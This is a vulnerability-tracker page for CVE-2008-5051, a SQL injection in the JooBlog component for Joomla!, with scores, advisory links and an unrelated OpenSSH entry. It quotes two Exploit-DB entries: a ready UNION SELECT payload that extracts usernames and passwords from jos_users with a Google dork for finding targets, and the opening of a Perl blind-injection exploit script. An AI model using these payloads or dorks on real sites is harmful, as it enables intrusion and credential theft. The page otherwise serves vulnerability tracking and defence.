CVE-2008-5051
published 2008-11-13CVE-2008-5051: SQL injection vulnerability in the JooBlog (com_jb2) component 0.1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the PostID…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.01%
58.9th percentile
SQL injection vulnerability in the JooBlog (com_jb2) component 0.1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the PostID parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jooblog | jooblog | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat8.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-565g-m29m-4549: SQL injection vulnerability in the JooBlog (com_jb2) component 0
ghsa_unreviewed·2022-05-14
CVE-2008-5051 [HIGH] CWE-89 GHSA-565g-m29m-4549: SQL injection vulnerability in the JooBlog (com_jb2) component 0
SQL injection vulnerability in the JooBlog (com_jb2) component 0.1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the PostID parameter to index.php.
Red Hat
CVE-2008-4109: A certain Debian patch for OpenSSH before 4
vendor_redhat·CVSS 8.1
CVE-2008-4109 [HIGH] CVE-2008-4109: A certain Debian patch for OpenSSH before 4
A certain Debian patch for OpenSSH before 4.3p2-9etch3 on etch; before 4.6p1-1 on sid and lenny; and on other distributions such as SUSE uses functions that are not async-signal-safe in the signal handler for login timeouts, which allows remote attackers to cause a denial of service (connection slot exhaustion) via multiple login attempts. NOTE: this issue exists because of an incorrect fix for CVE-2006-5051.
Statement: Not vulnerable. The patch used to fix CVE-2006-5051 in Red Hat Enterprise Linux 2.1, 3, 4, and 5 was complete and does not suffer from this problem.
No detection rules found.
Exploit-DB
Joomla! Component JooBlog 0.1.1 - 'PostID' SQL Injection
exploitdb·2008-11-10
CVE-2008-5051 Joomla! Component JooBlog 0.1.1 - 'PostID' SQL Injection
Joomla! Component JooBlog 0.1.1 - 'PostID' SQL Injection
---
#######################################################
Joomla Component com_jb2(PostID) SQL-injetion Vulnerability
#######################################################
###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, LiTTle-Hack3r, L1RIDON1.
#[!] Module_Name: com_jb2
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"option=com_jb2 "PostID"
##################################################
#[~] Example:
http://localhost/Path/index.php?option=com_jb2&PostID=[exploit]
#[~] Exploit:
-9999'/**/UNION/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/*
##############################
Exploit-DB
Joomla! Component JooBlog 0.1.1 - Blind SQL Injection
exploitdb·2008-06-03
CVE-2008-5051 Joomla! Component JooBlog 0.1.1 - Blind SQL Injection
Joomla! Component JooBlog 0.1.1 - Blind SQL Injection
---
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # Joomla Component JooBlog Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Dork : inurl:com_jb2 #\n";
print " # Usage: perl jooBlog.pl host path #\n";
print " # Example: perl jooBlog.pl www.host.com /joomla/ -c 5 #\n";
print " # #\n";
print " # Options: #\n";
print " # -c Category id #\n";
print " #######################################
No writeups or analysis indexed.
http://securityreason.com/securityalert/4581http://www.securityfocus.com/archive/1/498234/100/0/threadedhttp://www.securityfocus.com/bid/32236http://www.vupen.com/english/advisories/2008/3094https://www.exploit-db.com/exploits/7078http://securityreason.com/securityalert/4581http://www.securityfocus.com/archive/1/498234/100/0/threadedhttp://www.securityfocus.com/bid/32236http://www.vupen.com/english/advisories/2008/3094https://www.exploit-db.com/exploits/7078
2008-11-13
Published